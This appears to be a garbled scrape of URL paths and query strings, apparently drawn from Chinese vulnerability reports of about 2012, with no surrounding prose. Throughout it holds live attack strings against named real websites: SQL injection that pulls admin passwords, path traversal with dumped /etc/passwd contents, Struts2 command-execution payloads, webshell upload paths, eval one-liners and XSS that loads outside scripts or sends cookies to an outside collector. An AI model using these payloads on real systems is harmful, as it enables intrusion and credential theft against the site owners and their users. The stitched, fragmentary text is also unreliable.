/signin.asp / / / /user.htm /app/index.asp / /index/topicshow?tpid=7824 /index/topicone?tpid=9138 /sports.html /login.htm sina sinasun /login.htm sina sinasports /sports/index.htm /upload/ /sina_jb9 /sina_sports_tel_001 /sina_sports_cnc_001 /cgi-bin/sinapac.pl /gsps/ /sina_yc_ch7 /espn_ita_ch1 www.fussballdaten.de/england/2008/6/ /admin/admin_login.php /admin/yjadmin/admin_login.php espn_ita_ch1ums://60.28.175.170:7004#ums://125.64.1.9:7004 espn_ita_ch2ums://60.28.175.171:7004#ums://218.30.13.223:7004 espn_ita_ch3ums://202.108.43.152:7003#ums://218.30.115.154:7003 espn_ita_ch4ums://60.28.175.170:7005#ums://125.64.1.9:7005 espn_ita_ch5ums://60.28.175.170:7006#ums://125.64.1.9:7006 espn_ita_ch6ums://60.28.175.170:7007#ums://125.64.1.9:7007 espn_ita_ch7ums://60.28.175.170:7008#ums://125.64.1.9:7008 espn_ita_ch8ums://60.28.175.170:7009#ums://125.64.1.9:7009 livecast.sina.com.cn/InfoLive/ 124.243.201.173 wintvshare Password:12345 www.plvideo.premiumtv.co.uk/premierLeague/login.html www.plvideo.premiumtv.co.uk /espn_ita_ch1 sports.sina.com.cn/itatv/free-u-live.shtml?id=YJ04-SPRN /admin/default.aspx /aion/cat.php?id=items&w=shipin&n=xianglian /dnf/tip.php /paihang/shishi/ /paihangbang/renqibang/ db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/dnf/cat.class.php /e-saleCard/cardOrder!noRegistered.action /oa/chanpinpub/chanpinpub!manager.action /article/article!detail.action /post/teacher.action /frontNewInfo.action /press/excellentInit.action /proj/menuLink.action /apparatus!showApparatus.action false /webservice/sina_vote/vote_resultn.php?categ=aurevoirtaipei&set_no=234 /wzxx/search.do?key=88952634&keyID=1 /wzxx/search.do?key=88952634&keyID=1 /wzxx/search.do?key=88952634&keyID=1 /wzxx/search.do?key=88952634&keyID=1 /LoginAction/userLogin.do /soufun_forum/post/frm_post_modify.aspx none /rss.php?rtype=../../../../../etc/passwd%00 x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:81:81:System /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:34:34:Network /var/crash:/bin/bash x:28:28:NSCD /:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:66:65:tog-pegasus /var/lib/Pegasus:/sbin/nologin x:100:101:IIIMF /usr/lib64/im:/sbin/nologin x:48:48::/data/app:/bin/bash x:512:512::/home/mysql:/bin/bash x:38:38::/etc/ntp:/sbin/nologin x:518:519::/data/app/Oscar:/bin/bash vote_www:x:519:520::/data/app/vote.www.iciba.com:/bin/bash x:101:102:nagios:/var/log/nagios:/bin/sh x:520:521::/data/app/192.168.0.14/news.iciba.com/:/sbin/nologin x:525:48::/data/app/wap.iciba.com/wwwroot:/bin/bash ciba_duanjing:x:522:48::/data/app/wap.iciba.com/wwwroot:/sbin/nologin x:528:48::/data/apps/wap.iciba.com/iciba_wap/ef_survey:/sbin/nologin x:530:530::/home/cibayw:/bin/bash x:533:533::/data/app/wap.iciba.com/:/sbin/nologin x:535:535::/home/jinqifa:/bin/bash x:536:536::/opt/kingsoft/sbin/data/baknsliciba:/bin/bash x:537:537::/data/app/192.168.0.14/news.iciba.com/test:/bin/bash x:538:538::/data/app/sl.iciba.com/wwwroot/:/bin/bash x:539:539::/home/xueni:/bin/bash sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php xsd="http://www.w3.org/2001/XMLSchema xsi="http://www.w3.org/2001/XMLSchema-instance trackback="http://madskills.com/public/xml/rss/module/trackback/ wfw="http://wellformedweb.org/CommentAPI/ dc="http://purl.org/dc/elements/1.1/ /admin/index.php?mod=login&act=ajaxlogin&username='or''=''or''='&pwd='or''=''or''= /admin/index.php /esysadmin/bsf/index.action /esysadmin/eweb/ /admin dict.iciba.com/lib/Ciba.class.php /admin/ /admin/include/left.jsp /Investment/info/loadallInfoDataList.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /Investment/code.jsp?c="test%20by%20wooyun /jxwfkjlweb/doAnnouncement.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /jxwfkjlweb/code.jsp?c="shell /jxwfkjlweb/shell.jsp /phpcms/index.php?m=search&a=public_get_suggest_keyword&url=http://localhost/&q=1 /phpcms/index.php?m=attachment&a=album_dir&dir=.\.\ /index.php?m=../model&c=member_group_model.class v9.demo.phpcms.cn/phpcms/libs/classes/application.class.php /index.php?m=../../ v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php:15 v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php post get 5px 15px;line-height:20px uri,导致click /zone/zone.action / /并且登录 /swf/FileUploader.swf然后应用 / /android/user/favdetail.jsp /research/view/concept.action / /edit/crm_filepreview.aspx?fileid=xxx&flg=1 / / www.chinaedu.com www.chinaedu.com /users!initLogin.action /newscenter/calendar/calendar_2005.html /)的高德中彩OA管理中心登录页面(http://oa.happypool.net/index.html)存在SQL注入漏洞,不仅可以使用万能密码('or'a'='a)登录,还可以获得数据库中数据。 /api/upload/index.php?action=list_image&objid=image_api_thumb&dir=/../../../ /rp?wd=914084284&tn=rp_tieba_image&staticpage=javascript:alert%28/test/%29;// /rp?wd=914084284&tn=rp_tieba_image&staticpage=http://www.wooyun.org http://localhost/phpcms/yp/business/?file=../../xxoo.txt%00 /phpcms/yp/business/?file=../../admin/upload&C[upload_allowext]=php|Php%00.|php%00&dosubmit=yes http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template= /csc/bangzhu.nsf/frmBangZhu /index.php?act=usercenter.messageinfo&messageid={id}%20and%20exists%28select%20password%20from%20system_user%29%23 /admin/index.php?act=login /admin/style/js/fckeditor/editor/filemanager/connectors/test.html /mailbox.do?method=view&id=1&mbType=0&type=2 /mailbox.do?method=view&id=2&mbType=0&type=2 /mailbox.do?method=view&id=3&mbType=0&type=2 /mailbox.do?method=view&id=4&mbType=0&type=2 /mailbox.do?method=view&id=5&mbType=0&type=2 break-all /jumpSerach.do?method=sendMailBox&idtagNo= /jumpSerach.do?method=sendMailBox&idtagNo=90449 /{Path}/wp-includes/registration-functions.php /jf/user/loginout.action存在Struts2远程命令执行漏洞 /forum.php?mod=image&aid=753&size=300x300&key=251d4107522ed3ab0b842ef9f69b2cf0&nocache=yes&type=fixnone /forum.php?mod=image&aid=1242959&size=300x300&key=d2c01bb59f1d3c17601494cc0689c962&nocache=yes&type=fixnone /powerword/images/m2.jpg%00.php /images/li38ngvkpvjxk.jpg/1.php /robots.txt /2012/pages/kingsoft/jobs.asp?did=300911000017 /wssb/index/xkws.action /docrec?title=%E5%8D%8E%E4%B8%BAC8812%E5%88%B7%E6%9C%BA%E6%95%99%E7%A8%8B&doc_id=ad1f9c82b9d528ea81c7795f&pu=sl@1,pw@4500,sz@1320_2001,pd@1,fz@3,lp@0,tpl@iphone page-notice.html www.top100.cn www.samsung.ccgslb.com.cn /content/395 /LDJAPP//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ http://www.bjld.gov.cn/LDJAPP/UserFiles/Image/shell.jsp odbc:ldj","sa","cns jtds:sqlserver://192.168.1.37:1433/middledata /LDJAPP/tools/crm.jsp /cardbiz /LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/web.xml&src=web.xml /content/395写了当时的测试过程,但是这个还是 /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../../lybbs/ /lybbs/shellnew.jsp /lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/web.xml /lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../netweb/detail/ /lemis/netweb/detail/shellnew.jsp /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ //FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ / /mf360/admin/index.aspx /cmnt/list.php?product=article&index=d795031t184v108&vt=4 /?sa=d795031t184v108&vt=4 /ivod/i/home/Play.aspx?vid=XNDI0MjM1NTgw&cid=98 /cgi-bin/act/a20100812icon/hide_icon.cgi?rid=0.09644990139701243&cmd=1&area=229&role=64457769666840392 /view/65604a8ad0d233d4b14e69f3?&st=3&pu=pw@4500lp,tpl@ /MCreditJx/cstper/reg/next.aspx /MCreditJx/ajaxpro/ApproveWeb_scMain_next,App_Web_am-0jttv.ashx /MCreditJx/cstper/reg/next.aspx 14.209.148.21* flash.178.com php?id= /xiaoyouxi/questionGame_admin/question.detail.php?id=72 /,输入网址http://3g.qq.com /g/s?sid=XXXXXXXXXXXXX&aid=home_self&g_f=9334 /g/profile/others_profile.jsp?from=visit&sid=XXXXXXXXXXXXX&u=目标用户QQ号&guest=true&g_ut=1 /antiad/report!reportList.action /notebook/my_jsb.php?showType=item&p=1&tim=1342313941&sort=2%20and%201=2%20union%20select%201,2,user%28%29,version%28%29,5,database%28%29,7,8-- /pay/payagreement.action /reg_check/check_user_login_v2.php?user_name=XXXX&user_passwd=XXXX /nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg /man/ /Shopping/OrderInfo.aspx?sid=94a21bae-3720-4c0c-95f5-27c8634d0034#topform /feedback/qlist.php?id=1那个列表中删除,不过从http://support.iciba.com/feedback/qdetail.php?id=Select_a_ID&from=qlist访问还是在的 /feedback/qdetail.php?id=18405&from=qlist /feedback/admin/question_list.php?do=del&pid=8&delid=Select_a_ID把Select_a_ID换成要删除的提问的ID,然后访问,会发现那个问题就从http://support.iciba.com/feedback/qlist.php?id=1中消失了 /htm_en/videorss_prd/.svn /feedback/admin/index.php /contacts/37009121/full?_dc=1342331522472&syncTag=0&limit=500 /mi/mi.php?mid="+mid+"&data="+data,{mid:mid,data:data /mi/mi.js /see/see_one.htm /User/MobileSearch.aspx /playerDetail.php?serverName=电信五&playerName=嘴子哥 /user/my_dictionary.php /news_view.php?typeName=%CD%BC%C6%AC%D0%C2%CE%C5&typeid=2 /member/my.php /card_select.action /22.jsp /yummi_beta/.ssh/authorized_keys /hr/zhaopin_list.aspx?flag=0&jobarea=1 /jxsj/girlchoice/index.php?act=detail&id=2601%27 /jxsj/girlchoice/index.php?act=detail&id=2601%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2%23 /jx3/updatepage/index.php?act=search&version=33333%27%20or%201=1%23 /interface/output.php?pid=3%20and%201=1--&uid=40522&page=1&items=10&format=comment_output&nu= /external/videov2.php?vid=1948%20and%201=1 /external/videov2.php?vid=1948%20and%201=2%20union%20select%201,2,3,4-- /feedback/admin_login.php /feedback/admin_login.php?act=login /order/order.action /soft/3116.html /feedback/qlist.php?id=1 /feedback/admin/question_list.php?do=del&pid=8&delid=Select_a_ID /wanglei_0216/voteshow_radio.php?tid= /wanglei_0216/voteshow_radio.php?tid=5 www.ip66.com /bencandy.php?id=44 /brand/shoufei/ /ispis/login/login.action /TTOP/sale/ticketOrderDetail_showOrder.action?orderId=8000000 /TTOP/sale/ticketOrderDetail_showOrder.action?orderId=8000001 / /ELSNetAccept/chose/showConsider_chose.action /event/img/07165.jpg/xxxxxxx1.php /pass/forgetPassword /home/nplus/submit/nav /" /","wooyun www.baidu.com的某Flash /content/368 /baidurookit.php /baidurookit.php.txt /baidurookit.php /baidurookit.js /",true /home/nplus/submit/nav",true %2F%2Fqzone.qq.com%2F%26quot /ajax/ajax_browsers.asp /u/1348319 /irun/index.php support.qq.com/login.shtml?fid=688&url=http://data.euro2012.qq.com/eurocupTencent/eurocup/euroLive.action?mid%3D%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%25%33%44%22替收信地址(填写asp收信地址,如:http://www.x.com/1.asp / /tologin.action /offShow.action?userId=475 law.people.com.cn/n_s.action /newsView.php?sid=&cnid=1503477&chid=1_11&coid=1_11_3_1&wv=2&v=l&return=channel&fromid=&uc_param_str=dnup /newsView.php?sid=&chid=1_11&coid=1_11_3_1&wv=2&v=l&return=channel&fromid=&uc_param_str=dnup&cnid=1503477 /index.php?action=content&coid=7_3_1&chid=7_3&nid=1021853'&wv=2&cp=1&sid=&fromid= /blogview.php?cid=0&ucid=0&bid=103597&wv=1.2&v=s&iv=zh&sid=&fromid= /tip.php?id=677455&fromid=&wv=2&uc_param_str=dnup /tip.php?id=677452&fromid=&wv=2 /xizangpic/big.php?id=111 /include/ /include/ /include/ /admin/login.php /irun/irungame/list.php?imageField4=&name=1&city=1 /transfer/website/ /transfer/website/systemIntroduce.action / /buyingcenter/buyingweb/showBusinessInfoOnWebAction.action / /doindex!index.action /ArticleRcd.aspx?idx=54 /admin/config/main.jsp /admin/config /admin/db.jsp /admin/config/main.jsp /admin/main.jsp /admin/config/main.jsp /admin/main.jsp /template.php?action=stat&id=554 /template.php?action=stat&id=554 /source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456 /updateGoodsinfo.php?gid=51730 / /maq/class/ /maq/upload.php /wwwroot.rar / x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:25:25:Named:/var/named:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin x:500:500::/home/bea:/bin/bash x:501:4::/home/itnmagt:/bin/bash doone_query:x:502:500::/home/doone_query:/bin/bash www.wodota.com/test.txt的一次检测 /admin.php?mod=phpcms&file=filemanager&action=down&fname=C%3A%2php%2php.ini&dir=./php/ /search/?key=%22+onmouseover='alert(/xss+by+i@tmxk.org/)'%3E /profile/Myarchives.php?save=ok write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62)) /myproduct/boughtlist.php 2.gy/ehAM /wishlist/cust_wish_list_more.php?wish_searchkey=%22%3E%3Cscript/src=//2.gy/ehAM%3E /index.php/module/action/param1/$%7B@phpinfo()%7D /Index/download_file_myxq/id/1155 /avent/avent_task_detail.php?id=6 /ucenter/topicinfo.php?tid=1300 /IOC/client/hall!index.action /taojin/dbconnect-taojin.php /gongwuyuan/zhiwei2010/detail.php?id=1 /web/login.html /admin /admin/view/machines/query.php会显示空白。 /admin/view/machines/query.php /admin/machines/query后奇迹出现了(去掉了view、以及php后缀名),各种游戏的服务器啊。 /admin/view/shell/index.php改为 /admin/shell /gongjiaowaibao/usertype.php /gongjiaowaibao/usertype.php /virtualhall/index.jsp /virtualhall/instance/searchinfo.jsp?flownum=%27||chr%2839%29||%27 /virtualhall/instance/searchinfo.jsp?flownum='||-1 /virtualhall/instance/searchinfo.jsp?flownum='||-1 /zjzt/queryList.php?zjztType=fuask&answerType=1 /zjzt/queryList.php?zjztType=fuask&answerType=1 61.135.153.184 /tv/tvadd2.php /home.php/Index/getmodle/factoryid/$%7B@eval%28$_POST[f]%29%7D / / /jsp/admin/UserAdd.jsp /jsp/admin/login.jsp /php/artcomment.php?artid=325577 /taoli/resource/addAdminUser.jsp /jdr/loginIndex.action /torrent/6442887 /torrent/7190651/ /torrent/7238404/ /57UN btih:4d93c83f807d8b88a4ba4108730caf3e7d6209fb /external/video.php?vid=517%20and%201=2%20union%20select%201,2,3%23 /xinxi/shownews.asp?id=(-575)UNION /xinxi/shownews.asp?id=(-575)UNION /mobileact/ma/index.do /register!forwardRegister.action /test/ /test/LoginWin.asp /test/admin/news/dynNewsShow.asp?id=4265 /test//admin.rar /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder= /caa/gb_news.php?id=1149&modid=01002 /forum/showone.html?ftype=1&id=2450 /mall/product.html?id=34 / /admin2/ /Zcfg.asp?ID=1 /admin/ /useradmin/topicsset/topicvideo.php?topicid=5475697 /licence/view_detail.jsp?id=00485537 /lottery/projectview.action?orderId=82211547357412686184 /zWirM7P,进入后如图 /NewsList.action /youmanage/manage/editcontract.php?page=&id=92 /youmanage/manage/ws_login.php /youmanage/manage/editcontract.php?id=207&page= /?c=resource /queue/serv_query_sdr.php?ver=1.0.0.1&sid=&t1=20120709&t2=20120710 / / / / /web-console/ServerInfo.jsp /web-console/ServerInfo.jsp /xinxi/shownews.asp?id=(-575) /xinxi/shownews.asp?id=%28-575%29%20%20or%281%29=%281%29 /xinxi/shownews.asp?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17&id=%2818%29from%28admin%29%29 www.safewaf.com也没有拦截 /oauth/request_token?org=sina&r=0.6129346313048337 /oauth/authorize /oauth/callback?appId=6&t1=1342784870957&org=sina&t2=1342784871023&ts=2aa30bf70a10cf47af75d4e8b4ac7a1c"/ /2012/ /post/info/ /product/webgame/ /post/ /Review/ReviewList.asp?NewId=1 /models/poppy/poppy_client.php /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /relationship/bulkfollow.php?language=zh_cn&uids=2802303401 alpha(opacity=0) absolute 0px 0px 100% 500px center 140px 105px;height:27px absolute 0px;left:0px /page/login/login.action /page/script/dbtools.jsp /script/dbtools.jsp name="android.permission.DISABLE_KEYGUARD"/ /developer/cn/newsshow.php?id=314 /thread-4229174-1-1.html /logtoken.php#1.jpg /index.php?appid=2&goto=http://bbs.xiaomi.cn/thread-4229174-1-1.html /thread-4229174-1-1.html?token=WVK%2B*************************************** /token.txt /extra.php?mod=xiaomi/authcallback&token=WVK%2B***************************************登录了 /commonCall.asp?action=showindex&id=17402 /loginmgmt/index.action /wxcs_act/indexBlessing.action /?do=display&mod=goods&id=10839 /admin/login.php /?do=display&id=3653&mod=../../../../../../../../../../etc/passwd%00.jpg /info.php /index.php?gid=312446 /index.php?gid=312446 /login.php /register.php /manage_user.php?action=edituser&managerid=test123&type=test123 /manage_user.php?action=edituser&managerid=admin /adminlogin.php?logout=true /login.asp /member/newapplication.asp /list.aspx?ctypeCode=0411 /list.aspx?ctypeCode=0411 / / /99/index.php /home.htm /soft/30850.htm /存在存储型xss,和浏览器结合危害比较大。 tmxk.org/m/c?="+document.cookie;alert /?m=show&id=33481 /?m=show&id=33482 /downloadfun.jsp?filename=downloadfun.jsp /twsearch/twSearch?key=asd& /twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollow.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E /twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollowajax.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E /pQfAP cc.i.sohu.com/a/app/counts/get.htm?ids=blog_228544023,blog_228108828,blog_228098977,blog_228095558,blog_228058235,blog_228052163,blog_227994519,blog_228005565,blog_227980500,blog_227859528,blog_227858958,blog_227825831,blog_227834137,blog_227818274,blog_227815969,blog_227813242,blog_227780666,blog_227776940,blog_227758059,blog_227757241&callback= stat.i.sohu.com/guest/frag/recents.do?callback= /ques/Index/questionnaire?qid=1 admin/gg1/list.asp admin/gg1/ /helpinfo/faq/wenti.asp?id=2166 /wuhan/ /xinxi/shownews.asp?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29 /xinxi/shownews.asp?id=%28-575%29UNION%20%28SEL%E%CT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29 com.netease.pris/databases/pris.db /student.asp?id=559 /student.asp?id=559%20and%20%28select%20char%2844%29%2b%20name%20from%20master..sysdatabases%20for%20xml%20path%29%3E0 /student.asp?id=-559%20union%20select%201,db_name%28%29,3,4,5,6,7,%28select%20%20char%2844%29%2bname%20from%20[sysobjects]%20where%20xtype=0x75%20for%20xml%20path%29%20,9,null /students.html /op/search.shtml?Type=ns&keyword=%27%3Cscript%3Ealert%281%29%3C/script%3E /SFMobile.xml com.netease.book/shared_prefs/com.netease.book_preferences.xml com.youdao.cube/shared_prefs/com.youdao.cube_preferences.xml com.netease.wb/databases/weibo.db com.netease.ca/shared_prefs/config.xml /index.action system_r:java_t:SystemLow-SystemHigh /gameAction!getSingleGame.action /newzhibo.php?showid=611 /cystars/fansclass/pic_list.php?active_type=2&cyid=2006849514 /album.php?action=show&aid=21441 /vote/vote_bicarsa.php?voteid=1534 /newzhibo.php?showid=611 /article.php?id=315425 gov.cn E_Type.asp?TypeId=7 /emall/SNNetStoreView?storeId=11554&catalogId=10654&langId=-7&from=index&storeType=0&storeName=&reqProvince=&reqCity= /emall/SNNetStoreInfoView?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/-- /emall/SNNetStoreInfoView?cityId1=9137&storeName=*/from%20syscat.schemata%20fetch%20first%201%20rows%20only%29,1,1%29%29%3E10--&dist1=aa%27or%20ascii%28SUBSTR%28%28select%20schemaname/* /cn/shopping.asp?cid=5 /jobs/jobs-list.php?aid=14 SELECT /shopadmin/index.php#ctl=system/tmpimage&act=index&theme= /shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../ /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /newscont.php?id=92 /admin/ /fckeditor/editor/filemanager/upload/php/upload.php?Type=Media /fckeditor/editor/filemanager/upload/test.html /attachments/files /taivid_admin/"发现好多默认的网站后台; www.taivid.cn、www.taivid.com,发现cn是主站全静态页面,com站加taivid_admin出现登陆后台,admin、admin登陆后台,后台可直接写入一句话,哎。。。。。 / /nexus/index.html,匿名用户有系统管理权,导致敏感信息泄漏,包括一些源码。 /bamboo /phpinfo.php /vote/vote.php?ud_id=71 /zt/2012/0507/content.php?id=1144 /phpmyadmin/ /Search.aspx?cid=2 /user/FClass.php?type=1 www.upyun.com 12.0 /setting.php /xss.js /index.php?c=main&a=content&id=336411ddddddddddddddddd&tag=info&page=0 look.php 1.xx.com/gq_date.dat 2.xx.com/db.dat /voteservice/admin/pid_list.php /crcc/rzxx-hzqy-detail.asp?id=355 /news_list.php?type=news /news_detail.asp?id=20100128 /data/sContent.rar /99/index.php?case=archive&act=search /99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=search /agreement.html /cgi-bin/frame_html?sid=Gzq2rxVvs4qFYFEB&r=eb991f7152c691593231cdd294e2d9c3 //index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php /down/class/index.php?myord=1 php:106 php:551 /v2/weather/city.php?pid=32 /jt//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php /UZH56T /zifei.php?tid=4423 /member/login.php write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))“ /Djlwz/tempuser/userregister.aspx /pin/sp/show/home?suid=98413539 void /zWiFcJh /footprint/trip/post/editsave / /jmx-console / /static/ /newLoginFull.q?callback=wooyun function() function(url,data,method,callback) function(url,callback) function(url,data,callback) /twAction/insertTwitter","msg=XSS&pics=%5B%7B%22url%22%3A%22http%3A%2F%2Fs2.t.itc.cn%2Fmblog%2Fpic%2F20127_26_13%2Fs_37750499540004660.png%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0055%5Cu005a%5Cu0048%5Cu0035%5Cu0036%5Cu0054%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%7D%5D",function(rs) /follow/addfollows","act=follow&friendids=299748820&uid=299748820",function(rs) /comment/8364dabba8236a6c06e03d11这个评论,某人发表“回应”后会在上面显示,对应一个reply_id。 /crossdomain.xml /celive/live/doajaxfileupload.php /celive/uploadfiles/CELIVE-2vOWcBQMQR.php /crmportal/Board/NewForm.aspx?categoryid=%7BDE1B01BE-5880-41B5-8E3D-D3B72F4BD4D4%7D /self/login.aspx www.gwbnsh.net.cn /self/login.aspx http://sh.centanet.com:80/wsmd/Default.aspx?mkt= /search/user?ageType=4&searchType=user&gender= /hope/live/scoreboard.php?match_id=2011_hope_13&rnd_num=1 /creditcard/view/vPointsearch.php?point_type=家居日用 /zhcx/zhcxAction!query.dhtml /stcms_html/member/u.php?action=list&where={sql 